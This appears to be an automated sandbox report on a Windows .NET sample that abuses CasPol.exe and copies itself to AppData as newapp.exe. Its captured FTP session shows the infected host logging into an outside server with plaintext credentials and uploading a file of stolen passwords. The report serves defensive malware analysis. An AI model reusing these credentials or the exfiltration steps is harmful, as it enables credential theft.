Nov 29, 2022 11:20:12.209414005 CET | 8.8.8.8 | 192.168.2.3 | 0xa066 | No error (0) | 51.195.62.160 | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49701 | 3.220.57.224 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-11-29 10:19:54 UTC | 0 | OUT | |
2022-11-29 10:19:54 UTC | 0 | IN | |
2022-11-29 10:19:54 UTC | 0 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Nov 29, 2022 11:20:12.250191927 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 2 of 50 allowed. 220-Local time is now 15:20. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. |
Nov 29, 2022 11:20:12.250646114 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 | USER user1@electrobist.com |
Nov 29, 2022 11:20:12.269206047 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 331 User user1@electrobist.com OK. Password required |
Nov 29, 2022 11:20:12.269444942 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 | PASS w&oNc9e]pf~4 |
Nov 29, 2022 11:20:12.296277046 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 230 OK. Current restricted directory is / |
Nov 29, 2022 11:20:12.314970016 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 504 Unknown command |
Nov 29, 2022 11:20:12.315330029 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 | PWD |
Nov 29, 2022 11:20:12.333745003 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 257 "/" is your current location |
Nov 29, 2022 11:20:12.334007978 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 | TYPE I |
Nov 29, 2022 11:20:12.352402925 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 200 TYPE is now 8-bit binary |
Nov 29, 2022 11:20:12.354644060 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 | PASV |
Nov 29, 2022 11:20:12.373279095 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 227 Entering Passive Mode (51,195,62,160,204,35) |
Nov 29, 2022 11:20:12.397758961 CET | 49702 | 21 | 192.168.2.3 | 51.195.62.160 | STOR PW_user-965543_2022_11_29_11_20_10.html |
Nov 29, 2022 11:20:12.416052103 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 150 Accepted data connection |
Nov 29, 2022 11:20:12.438832998 CET | 21 | 49702 | 51.195.62.160 | 192.168.2.3 | 226-File successfully transferred 226 0.023 seconds (measured here), 19.62 Kbytes per second |
Target ID: | 0 |
Start time: | 11:18:56 |
Start date: | 29/11/2022 |
Path: | C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x19218000000 |
File size: | 523776 bytes |
MD5 hash: | 92945D0A2731EF771EA9D10C792E03E1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | low |
Target ID: | 10 |
Start time: | 11:19:46 |
Start date: | 29/11/2022 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x10000 |
File size: | 107624 bytes |
MD5 hash: | F866FC1C2E928779C7119353C3091F0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Yara matches: |
Reputation: | moderate |
Target ID: | 11 |
Start time: | 11:20:05 |
Start date: | 29/11/2022 |
Path: | C:\Users\user\AppData\Roaming\newapp\newapp.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x800000 |
File size: | 107624 bytes |
MD5 hash: | F866FC1C2E928779C7119353C3091F0C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | .Net C# or VB.NET |
Antivirus matches: |
Reputation: | moderate |
Target ID: | 12 |
Start time: | 11:20:05 |
Start date: | 29/11/2022 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff745070000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 13 |
Start time: | 11:20:13 |
Start date: | 29/11/2022 |
Path: | C:\Users\user\AppData\Roaming\newapp\newapp.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x490000 |
File size: | 107624 bytes |
MD5 hash: | F866FC1C2E928779C7119353C3091F0C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | .Net C# or VB.NET |
Reputation: | moderate |
Target ID: | 14 |
Start time: | 11:20:14 |
Start date: | 29/11/2022 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff745070000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Execution Graph
Execution Coverage: | 16% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 4.2% |
Total number of Nodes: | 407 |
Total number of Limit Nodes: | 50 |
Function | Relevance | Strings | APIs | Instructions | Tags |
---|---|---|---|---|---|
05EE8B28 | 5.4 | 4 | | 385 | COMMON |
05EE3D4C | 3.2 | 2 | | 749 | COMMON |
05E95F40 | 2.8 | | | 2761 | COMMON |
05EE0040 | 2.4 | 1 | | 1177 | COMMON |
05EE33E4 | 1.9 | 1 | | 648 | COMMON |
05EE372C | 1.7 | 1 | | 402 | COMMON |
05EE3730 | 1.6 | 1 | | 371 | COMMON |
05EEC1E0 | 1.6 | 1 | | 340 | COMMON |
05E929C8 | 1.0 | | | 1001 | COMMON |
05EE5668 | 0.8 | | | 769 | COMMON |
05DFBE50 | 0.8 | | | 760 | COMMON |
05E9BC40 | 0.5 | | | 462 | COMMON |
05E92020 | 0.5 | | | 458 | COMMON |
05DFF2A0 | 0.4 | | | 409 | COMMON |
05E90480 | 0.4 | | | 402 | COMMON |
05DF9708 | 0.4 | | | 391 | COMMON |
05E92170 | 0.4 | | | 362 | COMMON |
05EED3A0 | 0.3 | | | 315 | COMMON |
023FFC48 | 0.2 | | | 238 | COMMON |
05EEC054 | 0.2 | | | 233 | COMMON |
023F0878 | 1.8 | | 1 | 273 | memory, COMMON |
05DFE6F9 | 1.6 | | 1 | 124 | COMMON |
05EEC004 | 1.6 | | 1 | 116 | COMMON |
05EEDD86 | 1.6 | | 1 | 115 | COMMON |
023FD4AD | 1.6 | | 1 | 90 | library, COMMON |
023FA9A0 | 1.6 | | 1 | 89 | library, COMMON |
05EEAEDC | 1.6 | | 1 | 82 | COMMON |
05EEF1FC | 1.6 | | 1 | 65 | COMMON |
023F0AB3 | 1.6 | | 1 | 63 | memory, COMMON |
023F58AF | 1.6 | | 1 | 62 | COMMON |
023F0554 | 1.6 | | 1 | 55 | memory, COMMON |
05EEAF10 | 1.6 | | 1 | 55 | COMMON |
05EE8AC0 | 1.6 | | 1 | 55 | COMMON |
023F58C0 | 1.6 | | 1 | 54 | COMMON |
05EECD8C | 1.6 | | 1 | 52 | COMMON |
05EEBF2C | 1.6 | | 1 | 50 | COMMON |
05EECDAA | 1.5 | | 1 | 48 | COMMON |
05E9151F | 1.4 | 1 | | 110 | COMMON |
05E90B70 | 1.3 | 1 | | 78 | COMMON |
023F042C | 1.3 | | 1 | 44 | sleep, COMMON |
023F0B7A | 1.3 | | 1 | 44 | sleep, COMMON |
05E9F460 | 0.7 | | | 656 | COMMON |
05E94A29 | 0.4 | | | 409 | COMMON |
05E91768 | 0.4 | | | 405 | COMMON |
05E98ED8 | 0.3 | | | 282 | COMMON |
05E9C700 | 0.3 | | | 256 | COMMON |
05E91000 | 0.2 | | | 248 | COMMON |
05E95B70 | 0.2 | | | 241 | COMMON |
05E91CD8 | 0.2 | | | 229 | COMMON |
05E9FA30 | 0.2 | | | 214 | COMMON |
05E9F148 | 0.2 | | | 204 | COMMON |
05E9C3E0 | 0.2 | | | 201 | COMMON |
05E90DEB | 0.2 | | | 171 | COMMON |
05E9F400 | 0.1 | | | 130 | COMMON |
05E9FD1C | 0.1 | | | 128 | COMMON |
05E90C80 | 0.1 | | | 126 | COMMON |
05E9C853 | 0.1 | | | 123 | COMMON |
05E92626 | 0.1 | | | 118 | COMMON |
05E91A70 | 0.1 | | | 91 | COMMON |
05E91C78 | 0.1 | | | 89 | COMMON |
05E937DB | 0.1 | | | 89 | COMMON |
05E95AC1 | 0.1 | | | 88 | COMMON |
05E911E0 | 0.1 | | | 78 | COMMON |
05E959D7 | 0.1 | | | 74 | COMMON |
05E95BC0 | 0.1 | | | 66 | COMMON |
05E926C8 | 0.1 | | | 64 | COMMON |
05E93838 | 0.1 | | | 52 | COMMON |
05E91BB8 | 0.1 | | | 52 | COMMON |
05E98EC8 | 0.1 | | | 51 | COMMON |
05E9C6F3 | 0.0 | | | 43 | COMMON |
05E95A38 | 0.0 | | | 33 | COMMON |
05E93897 | 0.0 | | | 25 | COMMON |
05E91C17 | 0.0 | | | 25 | COMMON |
05E9F39F | 0.0 | | | 25 | COMMON |
05E94AE0 | 0.0 | | | 3 | COMMON |
05E9CA68 | 3.1 | 1 | | 1822 | COMMON |
023F6D20 | 1.5 | 1 | | 266 | COMMON |
05DF84B8 | 0.8 | | | 810 | COMMON |
05DF8408 | 0.8 | | | 803 | COMMON |
05DFD9A8 | 0.6 | | | 639 | COMMON |
05DFB4E0 | 0.4 | | | 433 | COMMON |
01130958 | 2.9 | 1 | | 1635 | COMMON |
011302DC | 1.5 | 1 | | 249 | COMMON |
0113094C | 1.4 | 1 | | 132 | COMMON |
01130448 | 1.3 | 1 | | 67 | COMMON |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01130708 Relevance: .1, Instructions: 112COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01130C40 Relevance: .1, Instructions: 99COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01130AF0 Relevance: .1, Instructions: 87COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 011305F0 Relevance: .1, Instructions: 79COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0113086F Relevance: .0, Instructions: 43COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01130569 Relevance: .0, Instructions: 39COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01130578 Relevance: .0, Instructions: 37COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00C00958 Relevance: 2.9, Strings: 1, Instructions: 1629COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00C002DC Relevance: 1.5, Strings: 1, Instructions: 249COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00C0094C Relevance: 1.4, Strings: 1, Instructions: 132COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00C00448 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00C00708 Relevance: .1, Instructions: 109COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00C00718 Relevance: .1, Instructions: 104COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00C00C40 Relevance: .1, Instructions: 95COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00C00C50 Relevance: .1, Instructions: 90COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00C00AF0 Relevance: .1, Instructions: 85COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00C00600 Relevance: .1, Instructions: 67COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00C0086F Relevance: .0, Instructions: 43COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00C00569 Relevance: .0, Instructions: 38COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00C00578 Relevance: .0, Instructions: 37COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |